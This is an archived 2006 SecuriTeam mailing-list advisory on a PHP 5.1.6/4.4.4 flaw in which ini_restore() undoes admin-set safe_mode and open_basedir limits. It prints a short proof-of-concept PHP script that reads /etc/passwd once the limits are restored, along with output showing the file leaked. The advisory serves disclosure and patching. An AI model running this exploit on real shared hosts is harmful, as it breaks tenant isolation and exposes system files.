Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()
Date: 10 Sep 2006 14:17:08 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()
------------------------------------------------------------------------


SUMMARY

"PHP is an HTML-embedded scripting language. Much of its syntax is 
borrowed from C, Java and Perl with a couple of unique PHP-specific 
features thrown in. The goal of the language is to allow web developers to 
write dynamically generated pages quickly".

There is a privilage escalation vulnerability in PHP.

DETAILS

Vulnerable Systems:
 * PHP 5.1.6 / 4.4.4

Description:
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write 
dynamically generated pages quickly.

A nice introduction to PHP by Stig S ther Bakken can be found at  
<http://www.zend.com/zend/art/intro.php> 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of 
the PHP Conference Material is freely available.

php_admin_value  name  value

Sets the value of the specified directive. This can not be used in 
htaccess files. Any directive type set with php_admin_value can not be 
overridden by .htaccess or virtualhost directives. To clear a previously 
set value use none as the value.
php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in 
htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.

 <http://pl.php.net/manual/en/configuration.changes.php> 
http://pl.php.net/manual/en/configuration.changes.php

1. php_admin_value and php_admin_flag Bypass
When using PHP as an Apache module, you can also change the configuration 
settings using directives in Apache configuration files (e.g. httpd.conf). 
This options are using by a lot of ISP to set open_basedir, safe_mode and 
more options.

For example:
open_basedir in httpd.conf

<Directory /usr/home/frajer/public_html/>
    Options FollowSymLinks MultiViews Indexes
    AllowOverride None
    php_admin_flag safe_mode 1
    php_admin_value open_basedir /usr/home/frajer/public_html/
</Directory>


In PHP are two config options. Are Local Value and Master Value. More in 
phpinfo() or ini_get()

Example:
If you have safe_mode or open_basedir (etc) set in Local Value for 
selected users and in Master Value is default value, you can restore 
Master Value to Local Value per ini_restore() function!

ini_restore

(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option

Restores the value of a php.ini file. Then your PHP options from 
httpd.conf are bypassed.

Exploit:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>

Exploit results::

/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. 
File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in 
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: 
Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for 
inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # 
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

This issue is very dangerous, because Admin can't correct set open_basedir 
or safe_mode for all users.

Patch Availability:
Fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.
 <http://cvs.php.net/viewcvs.cgi/php-src/NEWS> 
http://cvs.php.net/viewcvs.cgi/php-src/NEWS


ADDITIONAL INFORMATION

The information has been provided by  <mailto:max@jestsuper.pl> 
Maksymilian Arciemowicz.
The original advisory can be found here:  
<http://securityreason.com/achievement_securityalert/42> 
http://securityreason.com/achievement_securityalert/42.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore(), SecuriTeam <=
Previous by Date:  [UNIX] Ipswitch Collaboration Suite SMTP Server Stack Overflow, SecuriTeam
Next by Date:  [UNIX] X11R6 XKEYBOARD Extension strcmp() Buffer Overflow, SecuriTeam
Previous by Thread:  [UNIX] Ipswitch Collaboration Suite SMTP Server Stack Overflow, SecuriTeam
Next by Thread:  [UNIX] X11R6 XKEYBOARD Extension strcmp() Buffer Overflow, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]